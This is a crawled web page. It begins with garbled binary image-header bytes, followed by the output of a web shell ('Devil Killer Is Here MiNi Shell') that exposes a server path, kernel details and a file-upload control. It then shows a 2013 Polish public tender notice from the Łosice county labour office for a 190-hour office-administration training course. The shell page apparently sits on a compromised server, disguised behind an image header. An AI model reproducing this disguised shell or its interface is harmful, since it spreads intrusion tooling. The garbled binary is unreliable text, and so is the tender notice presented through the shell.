JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130719/284170-N-2013.html

<p class="kh_header"><b>Łosice: usługa szkoleniowa</b><br>
<b>Numer ogłoszenia: 284170 - 2013; data zamieszczenia: 19.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Łosicach , ul. Narutowicza 6, 08-200 Łosice, woj. mazowieckie, tel. 083 3573330, faks 083 3573330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.puplosice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa szkoleniowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pod nazwą Kurs pracownika administracyjno-biurowego dla 15 osób Uczestników/ Uczestniczek Projektu Nie Daj Się Wykluczyć! realizowanego przez Powiat Łosicki/ Powiatowy Urząd Pracy w Łosicach w partnerstwie z Gminą Olszanka/ Gminnym Ośrodkiem Pomocy Społecznej w Olszance w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu VII Promocja integracji społecznej, Działania 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym. Celem szkolenia jest przygotowanie Uczestników/Uczestniczek projektu Nie Daj Się Wykluczyć! do prowadzenia biura i sekretariatu pracodawcy. Miejsce szkolenia: miasto Łosice. Liczba godzin szkolenia 190 godzin zegarowych, przy czym za godzinę zegarową uznaje się: 1 godzina zegarowa 45 minut zajęć plus 15 minut przerwy. Zakres szkolenia: I Moduł Organizacja pracy biura około 65 godzin (zasady pracy w biurze i w sekretariacie; konstruowanie pism; zarządzanie dokumentacją, w tym elektroniczną, obieg dokumentów; archiwizacja dokumentacji, w tym elektronicznej; organizacja efektywnych spotkań i zebrań; obsluga klientów i gości; zasady prowadzenia rozmów telefonicznych.); II Moduł Podstawowe procedury administracyjno-prawne około 60 godzin (Kodeks postępowania administracyjnego; instrukcja kancelaryjna; podstawy prawa pracy; specyfika prawa pracy w porównaniu z innymi gałęziami prawa); III Moduł Obsługa komputera i urządzeń biurowych około 65 godzin (podstawowe zagadnienia dotyczące obsługi komputera i urządzeń biurowych; praca w środowisku Windows ze szczególnym uwzględnieniem edytora tekstów i arkusza kalkulacyjnego - praktyczne ćwiczenia; obsługa spraw kadrowo-płacowych w programach użytkowych typu Płatnik, Symfonia). Wykonawca zobowiązany jest przedłożyć na druku stanowiącym zał. nr 1 do Formularza Ofertowego program szkolenia, sporządzony w oparciu o zakres szkolenia określony w pkt. 6 oraz uwzględniać standardy kwalifikacji zawodowych w zawodzie pracownik administracyjno-biurowy, zawarte na stronie: www.standardyiszkolenia.praca.gov.pl. Dopuszcza się modyfikację programu jeśli chodzi o kolejność poszczególnych zagadnień, modyfikację jeżeli chodzi o liczbę godzin w ramach bloków programowych. Wykonawca zobowiązany jest przeprowadzić szkolenie w formie wykładów, ćwiczeń, warsztatów. Celem intensyfikacji szkoleń oraz przeciwdziałania rozciągnięciu szkolenia w czasie, zajęcia muszą być realizowane przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu tzn. minimum 5 dni w tygodniu od poniedziałku do piątku z pominięciem niedziel i świąt, nie mniej niż po 6 godzin zegarowych dziennie i nie więcej niż po 8 godzin zegarowych dziennie w godzinach między 8.00 a 18.00. Wyjątkowo dopuszcza się organizację zajęć w soboty. Zajęcia muszą być zorganizowane przez maksymalnie 32 kolejno następujące po sobie dni (nie licząc sobót, niedziel i świąt). W przypadku, gdy szkolenie rozpocznie się w inny dzień tygodnia niż poniedziałek i/lub zakończy się w inny dzień niż piątek, to liczba godzin zegarowych szkolenia może być proporcjonalnie mniejsza w stosunku do przeciętnej liczby godzin zegarowych w tygodniu. Zamawiający wymaga, aby Wykonawca wskazał co najmniej trzech trenerów/ wykładowców/ szkoleniowców do realizacji zamówienia, którzy: 1 posiadają wykształcenie wyższe; 2 posiadają min. 2 letnie doświadczenie zawodowe z zakresu zagadnień wymienionych w module, z którego będą prowadzić zajęcia; 3 przeprowadzili min. 2 szkolenia grupowe (co najmniej 50 godzin jedno) dla min. 10 osób z zakresu zagadnień wymienionych w module, z którego będą prowadzić zajęcia w okresie trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia szkoleń jest krótszy, to w tym okresie. Zamawiający dopuszcza możliwość prowadzenia przez jednego trenera/ wykładowcę/ szkoleniowca więcej niż jednego modułu, jednak zgodnie z w/w warunkami osoba taka musi posiadać doświadczenie zawodowe i doświadczenie w postaci prowadzenia min. 2 szkoleń grupowych (co najmniej 50 godzin jedno) dla min. 10 osób do każdego modułu osobno. Wykonawca musi zapewnić salę wykładową dostosowaną do liczby Uczestników/ Uczestniczek w grupie (min 2 m2 powierzchni na jednego uczestnika), spełniającą wymogi BHP oraz posiadającą zaplecze sanitarne (WC, umywalka). Sala powinna być wyposażona w sprzęt dydaktyczny: tablicę do pisania lub flipchart, diaskop lub rzutnik multimedialny. Pracownia komputerowa powinna posiadać minimum 15 samodzielnych stanowisk (jedno stanowisko na jednego Uczestnika/ Uczestniczkę szkolenia). Każda osoba biorąca udział w szkoleniu musi mieć dostęp do wszystkich programów komputerowych wykorzystywanych w ramach danego modułu. Pomieszczenia, w których odbywa się szkolenie muszą być odpowiednio oznakowane, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki (PO KL). Do realizacji szkolenia Wykonawca zapewni każdemu Uczestnikowi/ Uczestniczce szkolenia materiały szkoleniowe: min. 1 podręcznik lub skrypt dotyczący zakresu szkolenia, zawierający min 20 kartek, notes, długopis, pen-drive o pojemności min. 2 GB na którym będą zapisane wszystkie materiały oraz prezentacje użyte na szkoleniu. Materiały szkoleniowe, które po zakończeniu wsparcia szkoleniowego przechodzą na własność każdego(ej) Uczestnika/ Uczestniczki szkolenia muszą być odpowiednio oznakowane, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki (PO KL). Wykonawca zapewni jeden komplet materiałów i pomocy szkoleniowych do archiwizacji dokumentacji dla Zamawiającego. Wykonawca zapewni Uczestnikom/ Uczestniczkom szkolenia podczas przerwy w warsztatach/ wykładach/ ćwiczeniach w każdym dniu szkolenia, catering w formie suszu konferencyjnego (kawa i herbata, śmietanka do kawy, cytryna świeżo skrojona w plasterki, cukier, zimne napoje min 2 butelki 0,5l/osobę, ciastka) oraz jeden ciepły posiłek, składający się min. z sztuki mięsa/ ryby o wadze min. 200 g, ziemniaki/ ryż/ makaron o wadze min. 200g, zestaw min. 3 surówek o wadze min. 200 g każda; w przypadku dań wegetariańskich porcja obiadowa o wadze 450 g dla jednego Uczestnika/ Uczestniczki szkolenia. Wykonawca zobowiązany jest do zapewnienia obsługi cateringowej wyłącznie przy użyciu produktów świeżych, spełniających normy jakości produktów spożywczych, jak również estetycznego podawania poczęstunku. Do przygotowania kawy i herbaty Uczestnicy/Uczestniczki muszą mieć zapewnione łyżeczki, filiżanki lub kubki jednorazowe przystosowane do napojów gorących. Wykonawca musi zapewnić Uczestnikom/ Uczestniczkom szkolenia pomieszczenie socjalne, umożliwiające higieniczne spożywanie poczęstunku. Wymagane jest, aby powierzchnia pomieszczenia socjalnego, liczba stolików i krzeseł była dostosowana do liczby Uczestników/Uczestniczek szkolenia. Ciepłe posiłki muszą być zróżnicowane i nie mogą powtarzać się częściej niż raz na 5 dni szkoleniowych. Sposób podania ciepłego posiłku: 1. w sytuacji dowozu posiłków do sali szkoleniowej każdy Uczestnik/ Uczestniczka szkolenia musi mieć zapewnione miejsce siedzące, drugie danie musi być podane na ciepło w pojemniku termoizolacyjnym z kompletem sztućców jednorazowych i serwetek, 2. w sytuacji spożywania posiłków w restauracji, stołówce itp. każdy Uczestnik/ Uczestniczka szkolenia musi mieć zapewnione miejsce siedzące, posiłki muszą być serwowane na ciepło, podane na zastawie obiadowej ze sztućcami i serwetkami. Miejsce posiłku nie może być oddalone więcej niż 5 minut drogi pieszo od miejsca przeprowadzenia szkolenia. Wykonawca zapewni opiekuna, czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z Uczestnikami/ Uczestniczkami szkolenia oraz Zamawiającym. Zamawiający wymaga od opiekuna obecności na szkoleniu w dniu rozpoczęcia i zakończenia szkolenia oraz bieżącego monitorowania/ nadzorowania przebiegu szkolenia. Po zakończeniu szkolenia Wykonawca zobowiązany jest do przeprowadzenia na koniec szkolenia oceny nabytych umiejętności w formie pisemnej, ankiety oceniającej szkolenie i wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z późn. zm.). W związku z realizacją szkolenia w ramach projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Wykonawca zobowiązany jest wydać zaświadczenie z logo Unii Europejskiej i EFS i Kapitału Ludzkiego i informacją Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Poddziałania 7.2.1 Programu Operacyjnego Kapitał Ludzki. Szkolenie jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Wykonawca jest zobowiązany przechowywać dokumenty związane z realizacją Projektu do dnia 31 grudnia 2020r. w sposób zapewniający dostępność poufność i bezpieczeństwo.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał wpis do rejestru instytucji  szkoleniowych (RIS) zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji  zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2013r  Nr 674,  z późn. zm.). Ocena spełnienia warunku będzie dokonana na podstawie Oświadczenia, że Wykonawca spełnia warunki  określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych (zał. nr  3 do SIWZ). Dodatkowo ocena spełnienia warunku dokonana będzie przez Zamawiającego poprzez weryfikację wpisu do RIS w elektronicznej bazie danych prowadzonej przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Warunek zostanie spełniony, jeśli Wykonawca będzie figurował w RIS na dzień składania ofert. Wykonawca może dołączyć do oferty zaświadczenie o wpisie do RIS.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności był krótszy, to w tym okresie zrealizował  min. 2 szkolenia w ilości min. 100 godzin dla min. 10 osób w zakresie zgodnym z przedmiotem zamówienia. W tym celu należy przedłożyć - Wykaz wykonanych usług (zał. nr 4 do SIWZ) w zakresie objętym przedmiotem zamówienia oraz załączyć dokumenty, czy wymienione usługi zostały wykonane lub są wykonywane należycie. Ocena spełnienia warunku dokonana będzie na podstawie treści wymaganych  dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać, że dysponuje odpowiednią salą wykładową,  dostosowaną do liczby Uczestników/Uczestniczek w grupie (min 2 m2 powierzchni na jednego Uczestnika/Uczestniczkę), spełniającą wymogi BHP oraz posiadającą zaplecze sanitarne (WC, umywalka). Sala powinna być wyposażona w odpowiedni sprzęt dydaktyczny: tablicę do pisania lub filipchart, diaskop lub rzutnik multimedialny. Pracownia komputerowa powinna posiadać minimum 15 samodzielnych stanowisk (jedno stanowisko na jednego Uczestnika/Uczestniczkę szkolenia). Każda osoba biorąca udział w szkoleniu musi mieć dostęp do wszystkich programów komputerowych wykorzystywanych w ramach danego modułu. W tym celu należy przedłożyć - Wykaz bazy lokalowej i techniczno - dydaktycznej (zał. nr 5 do SIWZ). Ocena spełnienia warunku dokonana będzie na podstawie treści wymaganego dokumentu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wskazał co najmniej trzech trenerów/ wykładowców/ szkoleniowców do realizacji zamówienia, którzy: 1. posiadają wykształcenie wyższe 2. posiadają min. 2 letnie doświadczenie zawodowe z zakresu zagadnień wymienionych w module, z którego będą prowadzić zajęcia, 3.przeprowadzili min. 2 szkolenia grupowe (co najmniej 50 godzin jedno) dla min. 10 osób z zakresu zagadnień wymienionych w module, z którego będą prowadzić zajęcia w okresie trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia szkoleń jest krótszy, to w tym okresie. W tym celu należy przedłożyć - Wykaz trenerów/ wykładowców/ szkoleniowców, przewidzianych do realizacji zamówienia (zał. nr 6 do SIWZ). Ocena spełnienia warunku dokonana będzie na podstawie treści wymaganych dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje szczegółowego warunku w tym zakresie.  Ocena spełnienia warunku dokonana będzie  na podstawie Oświadczenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Pzp (zał. nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o braku podstaw do wykluczenia z powodu nie spełniania warunków, o których mowa w art. 24  ust. 2 pkt 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - doswiadczenie wykonawcy w prowadzeniu tego typu szkoleń - 10</li>
<li>3 - posiadanie certyfikatu jakości kształcenia/szkolenia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. zmiany terminu i miejsca realizacji przedmiotu umowy a) w przypadku wystąpienia sytuacji związanych z działaniem siły wyższej, tj. wyjątkowych zdarzeń lub niezwykłych i nieprzewidzianych okoliczności nie zależnych od Strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było uniknąć, uniemożliwiających przeprowadzenie szkolenia w terminie lub miejscu wskazanym w ofercie. Wykonawca ma obowiązek zapewnić realizację przedmiotu zamówienia w   równoważnym miejscu i terminie uzgodnionym z Zamawiającym, b) konieczne okaże się wydłużenie terminu realizacji umowy z przyczyn organizacyjnych leżących po stronie Zamawiającego, w związku z niemożliwością realizacji przedmiotu zamówienia w zakładanym terminie. Wykonawca ma obowiązek zapewnić realizację przedmiotu zamówienia w terminie uzgodnionym z Zamawiającym. Powyższe zmiany muszą zostać zaakceptowane przez Zamawiającego, nie mogą wpłynąć na jakość realizowanej usługi  i na wysokość ceny za realizację usługi. Zmiana musi być dokonana w formie  pisemnej.  Do dokonania zmiany wymagane jest zawarcie stosownego aneksu. 2. zmiany osób wykonujących usługę. W przypadku zaistnienia okoliczności uniemożliwiających przeprowadzenie zajęć przez osoby wskazane przez Wykonawcę w ofercie na skutek  nieprzewidzianych okoliczności, tj. choroby, zgonu Wykonawca ma obowiązek  przedstawić dokumenty potwierdzające zaistniały fakt  i zapewnić osoby na zastępstwo o  takich samych  lub wyższych kwalifikacjach i doświadczeniu zawodowym wymaganym przez Zamawiającego. Powyższa zmiana wymaga akceptacji Zamawiającego ale nie wymaga  zmian   w umowie  i sporządzenia aneksu. 3. zmiany liczby osób skierowanych na szkolenie. Zamawiający dopuszcza zaistnienie okoliczności uniemożliwiających skierowanie na szkolenie liczby osób ustalonej w umowie, zależnej od liczby zdolnych do uczestnictwa w szkoleniu. Powyższa zmiana wymaga akceptacji Zamawiającego ale nie wymaga  zmian w umowie i sporządzenia aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.puplosice.pl zakładka Urząd - Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Łosicach ul. Narutowicza 6, 08-200 Łosice, pokój 62.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2013 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Łosicach ul. Narutowicza 6, 08-200 Łosice, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie jest organizowane w związku z realizacją przez Powiat Łosicki/Powiatowy Urząd Pracy w Łosicach w partnerstwie z Gminą Olszanka/Gminnym Ośrodkiem Pomocy Społecznej w Olszance projektu pt. Nie Daj Się Wykluczyć! nr POKL.07.02.01-14-027/12 w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu VII Promocja integracji społecznej, Działania 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałania 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.</p>
